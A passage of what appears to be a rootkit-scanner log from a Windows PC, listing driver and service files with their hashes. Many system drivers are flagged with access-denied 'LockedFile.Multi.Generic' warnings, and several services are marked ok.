23:24:03.0356 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pciide.sys. md5: B5B8B5EF2E5CB34DF8DCF8831E3534FA, sha256: F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480
23:24:03.0356 0x18fc  pciide - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0356 0x18fc  Object is SCO, delete is not allowed
23:24:03.0356 0x18fc  pciide ( LockedFile.Multi.Generic ) - warning
23:24:03.0356 0x18fc  Force sending object to P2P due to detect: pciide
23:24:03.0356 0x18fc  Object send P2P result: false
23:24:03.0404 0x18fc  [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
23:24:03.0404 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pcmcia.sys. md5: B2E81D4E87CE48589F98CB8C05B01F2F, sha256: 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14
23:24:03.0405 0x18fc  pcmcia - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0405 0x18fc  Object is SCO, delete is not allowed
23:24:03.0405 0x18fc  pcmcia ( LockedFile.Multi.Generic ) - warning
23:24:03.0417 0x18fc  [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw             C:\Windows\system32\drivers\pcw.sys
23:24:03.0418 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\pcw.sys. md5: D6B9C2E1A11A3A4B26A182FFEF18F603, sha256: BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36
23:24:03.0418 0x18fc  pcw - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0418 0x18fc  pcw ( LockedFile.Multi.Generic ) - warning
23:24:03.0418 0x18fc  Force sending object to P2P due to detect: pcw
23:24:03.0419 0x18fc  Object send P2P result: false
23:24:03.0478 0x18fc  [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
23:24:03.0478 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\peauth.sys. md5: 68769C3356B3BE5D1C732C97B9A80D6E, sha256: FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C
23:24:03.0478 0x18fc  PEAUTH - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0478 0x18fc  Object is SCO, delete is not allowed
23:24:03.0478 0x18fc  PEAUTH ( LockedFile.Multi.Generic ) - warning
23:24:03.0478 0x18fc  Force sending object to P2P due to detect: PEAUTH
23:24:03.0478 0x18fc  Object send P2P result: false
23:24:05.0150 0x18fc  [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost        C:\Windows\SysWow64\perfhost.exe
23:24:05.0190 0x18fc  PerfHost - ok
23:24:05.0470 0x18fc  [ 557E9A86F65F0DE18C9B6751DFE9D3F1, 630EE5A80335929517A22D130C75CBCE882B92978372A6F36C30B9D353C7BB07 ] pla             C:\Windows\system32\pla.dll
23:24:05.0590 0x18fc  pla - ok
23:24:05.0870 0x18fc  [ 79B2E811F5BCFED95AC44752CDC69C16, 2044E44C62E3AE210ED01E89574E95B96DFD535AF1752EAF963D815E1B1E2E20 ] PlaysService    C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe
23:24:05.0880 0x18fc  PlaysService - ok
23:24:05.0980 0x18fc  [ 23157D583244400E1D7FBAEE2E4B31B7, 4E8D93F746C727CE1A89B53FEFFCFB080AC3CC8F3CF2F8613E692E989794C52F ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
23:24:06.0050 0x18fc  PlugPlay - ok
23:24:06.0080 0x18fc  PnkBstrA - ok
23:24:06.0100 0x18fc  [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
23:24:06.0130 0x18fc  PNRPAutoReg - ok
23:24:06.0200 0x18fc  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
23:24:06.0220 0x18fc  PNRPsvc - ok
23:24:06.0300 0x18fc  [ 166EB40D1F5B47E615DE3D0FFFE5F243, E32BCCA0D25CD631C221986EBE9F6C54BF2F12DE1672D69CCC4E22AD07D0525A ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
23:24:06.0390 0x18fc  PolicyAgent - ok
23:24:06.0430 0x18fc  [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] Power           C:\Windows\system32\umpo.dll
23:24:06.0580 0x18fc  Power - ok
23:24:06.0610 0x18fc  [ 27CC19E81BA5E3403C48302127BDA717, C580FC552DDF9C163FC325B38B05C06FFD696495E4C01514BCD6346CFE4F0B40 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
23:24:06.0610 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\raspptp.sys. md5: 27CC19E81BA5E3403C48302127BDA717, sha256: C580FC552DDF9C163FC325B38B05C06FFD696495E4C01514BCD6346CFE4F0B40
23:24:06.0610 0x18fc  PptpMiniport - detected LockedFile.Multi.Generic ( 1 )
23:24:06.0610 0x18fc  Object is SCO, delete is not allowed
23:24:06.0610 0x18fc  PptpMiniport ( LockedFile.Multi.Generic ) - warning
23:24:06.0640 0x18fc  [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor       C:\Windows\system32\DRIVERS\processr.sys
23:24:06.0640 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\processr.sys. md5: 0D922E23C041EFB1C3FAC2A6F943C9BF, sha256: 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5
23:24:06.0640 0x18fc  Processor - detected LockedFile.Multi.Generic ( 1 )
23:24:06.0640 0x18fc  Object is SCO, delete is not allowed
23:24:06.0640 0x18fc  Processor ( LockedFile.Multi.Generic ) - warning
23:24:06.0690 0x18fc  [ F381975E1F4346DE875CB07339CE8D3A, 867BFC2E9A08E026289794019B8DE651A8604D06DD6A9BF166C29AFC24B6D26E ] ProfSvc         C:\Windows\system32\profsvc.dll
23:24:06.0790 0x18fc  ProfSvc - ok
23:24:06.0860 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] ProtectedStorage C:\Windows\system32\lsass.exe
23:24:06.0880 0x18fc  ProtectedStorage - ok
23:24:06.0950 0x18fc  [ EE992183BD8EAEFD9973F352E587A299, 6B28930FAA0A54FAADDAF2231553D7F5D45C7227454C6D49A86DFC9EF6BC9043 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
23:24:06.0950 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pacer.sys. md5: EE992183BD8EAEFD9973F352E587A299, sha256: 6B28930FAA0A54FAADDAF2231553D7F5D45C7227454C6D49A86DFC9EF6BC9043
23:24:06.0950 0x18fc  Psched - detected LockedFile.Multi.Generic ( 1 )
23:24:06.0950 0x18fc  Object is SCO, delete is not allowed
23:24:06.0950 0x18fc  Psched ( LockedFile.Multi.Generic ) - warning
23:24:06.0950 0x18fc  Force sending object to P2P due to detect: Psched
23:24:06.0950 0x18fc  Object send P2P result: false
23:24:07.0120 0x18fc  [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300          C:\Windows\system32\DRIVERS\ql2300.sys
23:24:07.0120 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ql2300.sys. md5: A53A15A11EBFD21077463EE2C7AFEEF0, sha256: 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489
23:24:07.0130 0x18fc  ql2300 - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0130 0x18fc  Object is SCO, delete is not allowed
23:24:07.0130 0x18fc  ql2300 ( LockedFile.Multi.Generic ) - warning
23:24:07.0160 0x18fc  [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx          C:\Windows\system32\DRIVERS\ql40xx.sys
23:24:07.0160 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ql40xx.sys. md5: 4F6D12B51DE1AAEFF7DC58C4D75423C8, sha256: FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE
23:24:07.0160 0x18fc  ql40xx - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0160 0x18fc  Object is SCO, delete is not allowed
23:24:07.0160 0x18fc  ql40xx ( LockedFile.Multi.Generic ) - warning
23:24:07.0180 0x18fc  [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE           C:\Windows\system32\qwave.dll
23:24:07.0200 0x18fc  QWAVE - ok
23:24:07.0220 0x18fc  [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
23:24:07.0220 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\qwavedrv.sys. md5: 76707BB36430888D9CE9D705398ADB6C, sha256: 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535
23:24:07.0220 0x18fc  QWAVEdrv - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0220 0x18fc  Object is SCO, delete is not allowed
23:24:07.0220 0x18fc  QWAVEdrv ( LockedFile.Multi.Generic ) - warning
23:24:07.0260 0x18fc  [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
23:24:07.0260 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rasacd.sys. md5: 5A0DA8AD5762FA2D91678A8A01311704, sha256: 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF
23:24:07.0260 0x18fc  RasAcd - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0260 0x18fc  Object is SCO, delete is not allowed
23:24:07.0260 0x18fc  RasAcd ( LockedFile.Multi.Generic ) - warning
23:24:07.0310 0x18fc  [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
23:24:07.0310 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\AgileVpn.sys. md5: 7ECFF9B22276B73F43A99A15A6094E90, sha256: 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1
23:24:07.0310 0x18fc  RasAgileVpn - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0310 0x18fc  RasAgileVpn ( LockedFile.Multi.Generic ) - warning
23:24:07.0391 0x18fc  [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto         C:\Windows\System32\rasauto.dll
23:24:07.0442 0x18fc  RasAuto - ok
23:24:07.0482 0x18fc  [ 87A6E852A22991580D6D39ADC4790463, 0F757C6E5B57DFC239CE1BEC88EF16C07E7F1A40D629A9A6DF3CB6B88FB9E642 ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
23:24:07.0482 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rasl2tp.sys. md5: 87A6E852A22991580D6D39ADC4790463, sha256: 0F757C6E5B57DFC239CE1BEC88EF16C07E7F1A40D629A9A6DF3CB6B88FB9E642
23:24:07.0482 0x18fc  Rasl2tp - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0482 0x18fc  Object is SCO, delete is not allowed
23:24:07.0482 0x18fc  Rasl2tp ( LockedFile.Multi.Generic ) - warning
23:24:07.0482 0x18fc  Force sending object to P2P due to detect: Rasl2tp
23:24:07.0482 0x18fc  Object send P2P result: false
23:24:07.0512 0x18fc  [ 47394ED3D16D053F5906EFE5AB51CC83, FE5D1249788DB6D85C55769251B0AED738D3BBA04DF57124E03397D3C0599286 ] RasMan          C:\Windows\System32\rasmans.dll
23:24:07.0592 0x18fc  RasMan - ok
23:24:07.0622 0x18fc  [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
23:24:07.0622 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\raspppoe.sys. md5: 855C9B1CD4756C5E9A2AA58A15F58C25, sha256: A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72
23:24:07.0622 0x18fc  RasPppoe - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0622 0x18fc  Object is SCO, delete is not allowed
23:24:07.0622 0x18fc  RasPppoe ( LockedFile.Multi.Generic ) - warning
23:24:07.0622 0x18fc  Force sending object to P2P due to detect: RasPppoe
23:24:07.0622 0x18fc  Object send P2P result: false
23:24:07.0642 0x18fc  [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
23:24:07.0642 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rassstp.sys. md5: E8B1E447B008D07FF47D016C2B0EEECB, sha256: FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C
23:24:07.0642 0x18fc  RasSstp - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0642 0x18fc  Object is SCO, delete is not allowed
23:24:07.0642 0x18fc  RasSstp ( LockedFile.Multi.Generic ) - warning
23:24:07.0642 0x18fc  Force sending object to P2P due to detect: RasSstp
23:24:07.0642 0x18fc  Object send P2P result: false
23:24:07.0702 0x18fc  [ 3BAC8142102C15D59A87757C1D41DCE5, C0C2C6887EA5A439E69221196348382ACE3E1942C9C6E0A970E153890F71724C ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
23:24:07.0702 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rdbss.sys. md5: 3BAC8142102C15D59A87757C1D41DCE5, sha256: C0C2C6887EA5A439E69221196348382ACE3E1942C9C6E0A970E153890F71724C
23:24:07.0702 0x18fc  rdbss - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0702 0x18fc  Object is SCO, delete is not allowed
23:24:07.0702 0x18fc  rdbss ( LockedFile.Multi.Generic ) - warning
23:24:07.0702 0x18fc  Force sending object to P2P due to detect: rdbss
23:24:07.0702 0x18fc  Object send P2P result: false
23:24:07.0722 0x18fc  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
23:24:07.0722 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rdpbus.sys. md5: 302DA2A0539F2CF54D7C6CC30C1F2D8D, sha256: 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17
23:24:07.0722 0x18fc  rdpbus - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0722 0x18fc  rdpbus ( LockedFile.Multi.Generic ) - warning
23:24:07.0722 0x18fc  Force sending object to P2P due to detect: rdpbus
23:24:07.0732 0x18fc  Object send P2P result: false
23:24:07.0750 0x18fc  [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
23:24:15.0236 0x18fc  Object is SCO, delete is not allowed
23:24:15.0236 0x18fc  usbccgp ( LockedFile.Multi.Generic ) - warning
23:24:15.0246 0x18fc  [ AF0892A803FDDA7492F595368E3B68E7, F263346DEB4D742EB436CF578F187AC8521D84CED52E98475E6198EC52244F07 ] usbcir          C:\Windows\system32\DRIVERS\usbcir.sys
23:24:15.0256 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbcir.sys. md5: AF0892A803FDDA7492F595368E3B68E7, sha256: F263346DEB4D742EB436CF578F187AC8521D84CED52E98475E6198EC52244F07
23:24:15.0256 0x18fc  usbcir - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0256 0x18fc  Object is SCO, delete is not allowed
23:24:15.0256 0x18fc  usbcir ( LockedFile.Multi.Generic ) - warning
23:24:15.0257 0x18fc  Force sending object to P2P due to detect: usbcir
23:24:15.0258 0x18fc  Object send P2P result: false
23:24:15.0277 0x18fc  [ 2EA4AFF7BE7EB4632E3AA8595B0803B5, CBECE7CEC0EFA4B283C63E9B6A270D595F5F3D006306DA5E5121BBFDCAB16376 ] usbehci         C:\Windows\system32\DRIVERS\usbehci.sys
23:24:15.0278 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbehci.sys. md5: 2EA4AFF7BE7EB4632E3AA8595B0803B5, sha256: CBECE7CEC0EFA4B283C63E9B6A270D595F5F3D006306DA5E5121BBFDCAB16376
23:24:15.0278 0x18fc  usbehci - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0278 0x18fc  Object is SCO, delete is not allowed
23:24:15.0278 0x18fc  usbehci ( LockedFile.Multi.Generic ) - warning
23:24:15.0318 0x18fc  [ 4C9042B8DF86C1E8E6240C218B99B39B, D286633311C047B9C4FB1AA89D7B02B9F943FDDCE473255DC8E14DD07CC9B292 ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
23:24:15.0318 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbhub.sys. md5: 4C9042B8DF86C1E8E6240C218B99B39B, sha256: D286633311C047B9C4FB1AA89D7B02B9F943FDDCE473255DC8E14DD07CC9B292
23:24:15.0318 0x18fc  usbhub - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0328 0x18fc  Object is SCO, delete is not allowed
23:24:15.0328 0x18fc  usbhub ( LockedFile.Multi.Generic ) - warning
23:24:15.0338 0x18fc  [ 58E546BBAF87664FC57E0F6081E4F609, 1DD99D57369A0069654432AB5325AFD8F7D422D531E053EA05FF664BA6BDAEF9 ] usbohci         C:\Windows\system32\DRIVERS\usbohci.sys
23:24:15.0338 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbohci.sys. md5: 58E546BBAF87664FC57E0F6081E4F609, sha256: 1DD99D57369A0069654432AB5325AFD8F7D422D531E053EA05FF664BA6BDAEF9
23:24:15.0338 0x18fc  usbohci - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0338 0x18fc  Object is SCO, delete is not allowed
23:24:15.0338 0x18fc  usbohci ( LockedFile.Multi.Generic ) - warning
23:24:15.0418 0x18fc  [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
23:24:15.0418 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbprint.sys. md5: 73188F58FB384E75C4063D29413CEE3D, sha256: B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C
23:24:15.0418 0x18fc  usbprint - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0418 0x18fc  Object is SCO, delete is not allowed
23:24:15.0418 0x18fc  usbprint ( LockedFile.Multi.Generic ) - warning
23:24:15.0418 0x18fc  Force sending object to P2P due to detect: usbprint
23:24:15.0418 0x18fc  Object send P2P result: false
23:24:15.0458 0x18fc  [ 080D3820DA6C046BE82FC8B45A893E83, EF4829A2D5B8D47AA7E06093EC85244042ED1CCFF43CC80DC44EF018B434197A ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
23:24:15.0458 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\USBSTOR.SYS. md5: 080D3820DA6C046BE82FC8B45A893E83, sha256: EF4829A2D5B8D47AA7E06093EC85244042ED1CCFF43CC80DC44EF018B434197A
23:24:15.0458 0x18fc  USBSTOR - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0458 0x18fc  USBSTOR ( LockedFile.Multi.Generic ) - warning
23:24:15.0458 0x18fc  Force sending object to P2P due to detect: USBSTOR
23:24:15.0458 0x18fc  Object send P2P result: false
23:24:15.0478 0x18fc  [ 81FB2216D3A60D1284455D511797DB3D, 121E52B18A1832E775EA0AE2E053BAA53E5A70E9754724B1449AE5992D63B13E ] usbuhci         C:\Windows\system32\DRIVERS\usbuhci.sys
23:24:15.0478 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbuhci.sys. md5: 81FB2216D3A60D1284455D511797DB3D, sha256: 121E52B18A1832E775EA0AE2E053BAA53E5A70E9754724B1449AE5992D63B13E
23:24:15.0478 0x18fc  usbuhci - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0478 0x18fc  Object is SCO, delete is not allowed
23:24:15.0478 0x18fc  usbuhci ( LockedFile.Multi.Generic ) - warning
23:24:15.0528 0x18fc  [ D501E12614B00A3252073101D6A1A74B, DFA3A83978125B3CE45C71DD9069E8A7938366D0F4B4B2401CDD07251253FA8C ] usbvideo        C:\Windows\system32\Drivers\usbvideo.sys
23:24:15.0528 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\usbvideo.sys. md5: D501E12614B00A3252073101D6A1A74B, sha256: DFA3A83978125B3CE45C71DD9069E8A7938366D0F4B4B2401CDD07251253FA8C
23:24:15.0528 0x18fc  usbvideo - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0528 0x18fc  usbvideo ( LockedFile.Multi.Generic ) - warning
23:24:15.0528 0x18fc  Force sending object to P2P due to detect: usbvideo
23:24:15.0528 0x18fc  Object send P2P result: false
23:24:15.0548 0x18fc  [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms           C:\Windows\System32\uxsms.dll
23:24:15.0578 0x18fc  UxSms - ok
23:24:15.0598 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] VaultSvc        C:\Windows\system32\lsass.exe
23:24:15.0608 0x18fc  VaultSvc - ok
23:24:15.0618 0x18fc  [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot        C:\Windows\system32\DRIVERS\vdrvroot.sys
23:24:15.0628 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vdrvroot.sys. md5: C5C876CCFC083FF3B128F933823E87BD, sha256: 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D
23:24:15.0628 0x18fc  vdrvroot - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0628 0x18fc  Object is SCO, delete is not allowed
23:24:15.0628 0x18fc  vdrvroot ( LockedFile.Multi.Generic ) - warning
23:24:15.0710 0x18fc  [ 44D73E0BBC1D3C8981304BA15135C2F2, 2849387BBCFB0189AF5604D2F7A631BD5D6BBB2CA73AF6E870069AF382A74DED ] vds             C:\Windows\System32\vds.exe
23:24:15.0790 0x18fc  vds - ok
23:24:15.0820 0x18fc  [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
23:24:15.0820 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vgapnp.sys. md5: DA4DA3F5E02943C2DC8C6ED875DE68DD, sha256: EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838
23:24:15.0820 0x18fc  vga - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0820 0x18fc  Object is SCO, delete is not allowed
23:24:15.0820 0x18fc  vga ( LockedFile.Multi.Generic ) - warning
23:24:15.0820 0x18fc  Force sending object to P2P due to detect: vga
23:24:15.0820 0x18fc  Object send P2P result: false
23:24:15.0840 0x18fc  [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave         C:\Windows\System32\drivers\vga.sys
23:24:15.0840 0x18fc  Suspicious file ( NoAccess ): C:\Windows\System32\drivers\vga.sys. md5: 53E92A310193CB3C03BEA963DE7D9CFC, sha256: 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125
23:24:15.0840 0x18fc  VgaSave - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0840 0x18fc  Object is SCO, delete is not allowed
23:24:15.0840 0x18fc  VgaSave ( LockedFile.Multi.Generic ) - warning
23:24:15.0860 0x18fc  [ C82E748660F62A242B2DFAC1442F22A4, 24AD6CAA918C5AB6F461D88825885C8637C224001AAD7A80BDC240368CDB0B7E ] vhdmp           C:\Windows\system32\DRIVERS\vhdmp.sys
23:24:15.0860 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vhdmp.sys. md5: C82E748660F62A242B2DFAC1442F22A4, sha256: 24AD6CAA918C5AB6F461D88825885C8637C224001AAD7A80BDC240368CDB0B7E
23:24:15.0860 0x18fc  vhdmp - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0860 0x18fc  vhdmp ( LockedFile.Multi.Generic ) - warning
23:24:15.0860 0x18fc  Force sending object to P2P due to detect: vhdmp
23:24:15.0860 0x18fc  Object send P2P result: false
23:24:15.0870 0x18fc  [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide          C:\Windows\system32\DRIVERS\viaide.sys
23:24:15.0870 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\viaide.sys. md5: E5689D93FFE4E5D66C0178761240DD54, sha256: 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27
23:24:15.0870 0x18fc  viaide - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0870 0x18fc  Object is SCO, delete is not allowed
23:24:15.0870 0x18fc  viaide ( LockedFile.Multi.Generic ) - warning
23:24:15.0890 0x18fc  [ 2B1A3DAE2B4E70DBBA822B7A03FBD4A3, 91F2B935E1E88C5542650F7D679A75D0562F4A5812179D1EC146D4B6351361E2 ] volmgr          C:\Windows\system32\DRIVERS\volmgr.sys
23:24:15.0890 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\volmgr.sys. md5: 2B1A3DAE2B4E70DBBA822B7A03FBD4A3, sha256: 91F2B935E1E88C5542650F7D679A75D0562F4A5812179D1EC146D4B6351361E2
23:24:15.0890 0x18fc  volmgr - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0890 0x18fc  Object is SCO, delete is not allowed
23:24:15.0890 0x18fc  volmgr ( LockedFile.Multi.Generic ) - warning
23:24:15.0980 0x18fc  [ 99B0CBB569CA79ACAED8C91461D765FB, 5BE394A39A941DE2AA1212E66B7068F90D423FA816238657CB9B2DA8BBE69B9B ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
23:24:15.0980 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\volmgrx.sys. md5: 99B0CBB569CA79ACAED8C91461D765FB, sha256: 5BE394A39A941DE2AA1212E66B7068F90D423FA816238657CB9B2DA8BBE69B9B
23:24:15.0980 0x18fc  volmgrx - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0980 0x18fc  Object is SCO, delete is not allowed
23:24:15.0980 0x18fc  volmgrx ( LockedFile.Multi.Generic ) - warning
23:24:15.0980 0x18fc  Force sending object to P2P due to detect: volmgrx
23:24:15.0980 0x18fc  Object send P2P result: false
23:24:16.0040 0x18fc  [ 58F82EED8CA24B461441F9C3E4F0BF5C, 40B8C9C9D1BEDD1507138273A3C000C753C8765E1873F2170DE63555A042928C ] volsnap         C:\Windows\system32\DRIVERS\volsnap.sys
23:24:16.0040 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\volsnap.sys. md5: 58F82EED8CA24B461441F9C3E4F0BF5C, sha256: 40B8C9C9D1BEDD1507138273A3C000C753C8765E1873F2170DE63555A042928C
23:24:16.0040 0x18fc  volsnap - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0040 0x18fc  Object is SCO, delete is not allowed
